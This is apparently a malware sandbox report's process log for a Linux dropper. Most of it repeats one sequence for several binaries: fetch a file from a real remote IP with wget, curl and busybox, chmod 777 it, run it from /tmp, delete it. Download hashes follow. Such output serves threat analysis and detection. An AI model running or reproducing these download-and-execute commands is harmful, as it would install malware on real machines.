/usr/bin/wgetwget http://87.120.125.191/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵PID:938
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:939
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵PID:940
-
-
/bin/chmodchmod 777 RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵
- File and Directory Permissions Modification
PID:941
-
-
/tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY./RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵
- Executes dropped EXE
PID:942
-
-
/bin/rmrm RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY2⤵PID:943
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵PID:944
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:945
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵PID:946
-
-
/bin/chmodchmod 777 jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵
- File and Directory Permissions Modification
PID:947
-
-
/tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY./jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵
- Executes dropped EXE
PID:948
-
-
/bin/rmrm jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY2⤵PID:949
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵PID:950
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:951
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵PID:952
-
-
/bin/chmodchmod 777 vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵
- File and Directory Permissions Modification
PID:953
-
-
/tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD./vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵
- Executes dropped EXE
PID:954
-
-
/bin/rmrm vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD2⤵PID:955
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵PID:956
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:957
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵PID:958
-
-
/bin/chmodchmod 777 vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵
- File and Directory Permissions Modification
PID:959
-
-
/tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa./vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵
- Executes dropped EXE
PID:960
-
-
/bin/rmrm vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa2⤵PID:961
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵PID:962
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:963
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵PID:964
-
-
/bin/chmodchmod 777 I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵
- File and Directory Permissions Modification
PID:965
-
-
/tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx./I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵
- Executes dropped EXE
PID:966
-
-
/bin/rmrm I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx2⤵PID:967
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵PID:968
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:969
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵PID:970
-
-
/bin/chmodchmod 777 MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵
- File and Directory Permissions Modification
PID:971
-
-
/tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL./MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵
- Executes dropped EXE
PID:972
-
-
/bin/rmrm MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL2⤵PID:973
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵PID:974
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:975
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵PID:976
-
-
/bin/chmodchmod 777 zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵
- File and Directory Permissions Modification
PID:977
-
-
/tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I./zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵
- Executes dropped EXE
PID:978
-
-
/bin/rmrm zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I2⤵PID:979
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97